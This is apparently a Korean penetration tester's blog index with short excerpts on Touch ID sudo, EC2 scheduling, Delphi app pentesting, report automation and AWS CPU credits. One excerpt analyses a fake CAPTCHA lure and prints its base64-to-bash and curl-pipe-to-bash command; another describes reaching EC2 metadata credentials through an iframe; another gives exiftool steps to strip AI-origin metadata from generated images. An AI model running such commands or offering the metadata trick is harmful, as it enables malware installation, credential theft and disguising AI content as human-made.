annyoung

Mac에서 비밀번호를 계속 입력하는게 귀찮아서 touch id로도 가능하지 않을까? 싶어서 찾아보니까 있더라..sudo 파일 수정sudo vi /etc/pam.d/sudosudo 파일 다음과 같이 수정# sudo: auth account password sessionauth include sudo_local#auth sufficient pam_smartcard.soauth sufficient pam_tid.soauth required pam_opendirectory.soaccount required pam_permit.sopassword required pam_deny.sosession r..

회사에서 운영중인 솔루션 악성 메일 훈련 서버와 콜센터(CRM) 서버가 있다. 이 둘의 특징은 24시간 켜놓기에는 너무 아깝다는 생각이 들기 때문에 다음과 같이 셋팅했다. 악성 메일훈련 서버: 평상시 OFF, 사용기간에만 사용자가 수동(채팅)으로 ON콜센터(CRM): 평일 08:00 ~ 19:00까지만 켜놓고 주말 및 공휴일은 OFF(스케줄링은 crontab 적용) openclaw skills는 다음과 같이 만들었다.(사실 AI 시키면 알아서 뚝딱 만들어준다)# EC2 제어test 인스턴스를 채팅으로 시작·중지·상태 조회한다.- 인스턴스 ID: `i-1234`- 리전: `ap-northeast-2`- AWS 프로파일: `test`- 스크립트: `/home/nopsled/.openclaw/workspace..

항상 내가 모의해킹하던 회사가 털렸다. 건너건너 들었는데 내가 항상 하는 해킹 방식이랑 비슷했지만 다른점이 하나 있었다.AI 에이전트가 시도때도 없이 어시스트하고 거의 사람은 컨펌하는 수준이라고 들었다. 손으로 찾다보니 A서비스에서 했던 시도를 생각도 못하고 C서비스에서도 못해봤는데 일관화가 필요할 것 같다. 내가 항상 했던 회사가 털리다니 착잡하다~..+추가: 어떤 트위터를 보고들 오시는지…. (댓글 부탁합니다…….)

GPT로 생성한 이미지의 exif 메타데이터를 확인해보면 떡하니 Ai로 만들었다고 나오게 된다. 어디에서 사용하던간에 Ai로 만든 이미지라는걸 걸리게 되면 저품질로 가는 지름길이다. 그렇기 때문에.. 파일명을 kakao에서 받은 이미지처럼 1차 변경해주고(원본 파일명을 수집하는 서비스도 있기 때문에), 다음과 같이 exiftool로 exif 메타데이터를 모두 지워준다.exiftool -all= ~/Downloads/KakaoTalk_Photo_2026-05-29-16-31-56.png 그리고 올리면 기본적인 우회가 된다.

어떤 웹 사이트에서 로봇이 아닌걸 증명해야 한다고 터미널에서 무언가 실행하라고 하길래 무슨 동작을할까 싶어서 살짝 찍먹해봤다. echo "Y3VybCAtcyAnaHR0c***[REMOVED]***2gnIHwgYmFzaA==" | base64 -d | bash 복사된 내용은 위와 같았고, base64로 인코딩된 문자열을 디코딩하여 bash 쉘로 실행해주는 역할을 하는데 디코딩하게되면 다음과 같은 내용이 나온다. curl -s 'https://***[REMOVED]***.digital/script.sh' | bash 마찬가지로 curl의 -s 옵션을 줬는데 slient mode로 output을 출력하지 않고 해당 script.sh를 다운로드 받아 bash 쉘로 실행하며 실행되는 내용은 다음과 같다. os..

Delphi로 만든 CS 프로그램 모의해킹 진행하면서 몇가지 적어보려고 한다. 기본적으로 델파이로 만든 CS 프로그램의 경우 폴더 구조를 살펴보면 *.bpl 이라는 확장자를 사용하곤 하는데 Borland Package Library의 줄임말로, 쉽게 말하자면 Delphi에서 사용하기 위한 dll이라 생각하면 된다. 그렇기에 bpl 확장자가 보이면 "아. 델파이구만!" 하면 된다. 대다수의 델파이로 만든 CS 프로그램이 Oracle TNS Protocol을 이용해 DB와 직접 커넥션을 맺는데, 이렇게 DB로 바로 접속하게되면 개발사의 장점은 유지보수가 쉽다는거고, 단점은 DB 계정 정보가 무조건적으로 노출된다는거다. 여기서 DB 계정정보를 Config.ini에 암호화해서 저장하더라도 DB 연결을 위해 복호..

보고서 작성에 지루함을 느낀 사람이라면 공감할거라 생각한다. 한 3년동안은 보고서를 수동으로 쓰다가 이거 어느정도 자동화 되겠는데? 싶어서 오토핫키로 처음에 맛만 봤다가 퍼포먼스가 너무 하자있어서 python으로 포팅하고 나서 지금까지 잘 쓰고있다. 모듈은 이걸 사용했다:https://docxtpl.readthedocs.io/en/latest/ 이처럼 보고서에다가 jinja template을 사용하면 잘 채워준다. docx에 코딩이라니..ㅋ 참고로 paragraph와 indentation이 조금 헬이니 참고할 것... 이미지 테두리 삽입하는 기능을 모듈에서 지원하지 않아 직접 구현했었으니 필요하면 참고하시라:https://nopsled.tistory.com/320 python docx add bor..

알려줬을지도 모르지만 제목을 조금 자극적이게 지어봤다. 유령 판매자라고 들어봤을지 모르겠다.* 유령 판매자란? 온라인 쇼핑몰이나 오픈마켓(쿠팡, 네이버 스마트스토어 등)에서 실제로는 상품을 보유하지 않거나 유령 회사(페이퍼 컴퍼니) 형태로 존재하면서, 사기 행각이나 개인정보 탈취를 목적으로 활동하는 판매자를 말합니다.(Ai 요약) 아마 나같은 사람이 있을지 모르겠는데 오픈마켓(G마켓, 쿠팡, 스마트스토어 등)에서 물품을 구매한 후, 배송이 너무 안와서 판매자에게 문의를 하면 재고가 없다면서 취소해달라하며 상품을 받지 못하는 경우가 존재할거라 생각한다.이로 인해 생기는 소비자의 문제는 물품 대금이 카드 결제 한도로 잡히게 되고 시간을 낭비한다. 그렇다고 정작 판매자에게는 자세한 패널티가 없다. 필자의 경우..

피해자 환경은 공격자 서버로 요청할 수 있게끔 iframe의 src attribute에 삽입해서 userAgent를 확인했을때 IE11+Windows로 파악했다. 더 확실하게 확인하기 위해서 iframe의 src에 http://localhost와 file:///C:\\ 했을때 결과를 봤다. iframe에서 에러난 화면이 ie11로 보였다. ie11 익스를 하려고 했는데 장애가 있을까봐 시도해보진 못했다. 우선 file 스키마나 cors는 브라우저가 이미 애초에 로컬 리소스를 띄워줬기 때문에 접근이 가능했지 않았을까 하는 생각이든다. 아니면 애초에 레거시 브라우저라서 가능했을 수도 있다. 아무튼 ec2 metadata 엔드포인트에 요청했고 다행히 credentials을 받아낼 수 있었다. 하지만 변수가 있..

우리 회사와 모회사에서 사용하는 AWS는 t3.micro 그리고 t2.medium을 사용하는 것으로 기억하는데, 가끔 가다가 cpu가 maximum을 찍어서 ssh나 웹서버가 죽는 현상이 발생했다. 사용자들이 많이 접속하지 않아 적은 스펙으로도 운영할 수 있는 그런 서비스들이라 생각했는데 인스턴스들이 자주 pending 되어버리는 현상이 발생했다. t2나 t3 인스턴스들은 사용하지 않는 경우 CPU 크레딧을 적립하고 많이 사용되는 경우 적립된 크레딧을 가지고 CPU를 버스트하여 퍼포먼스를 끌어올릴 수 있는데, 버스트를 하고 있음에도 불구하고 뻗어버렸다. 공통적으로 알 수 있는건 CloudWatchd에서 CPUUtilization이 6이상 9까지 찍어버리는데, 이 경우 서버의 모든 프로세스가 pending..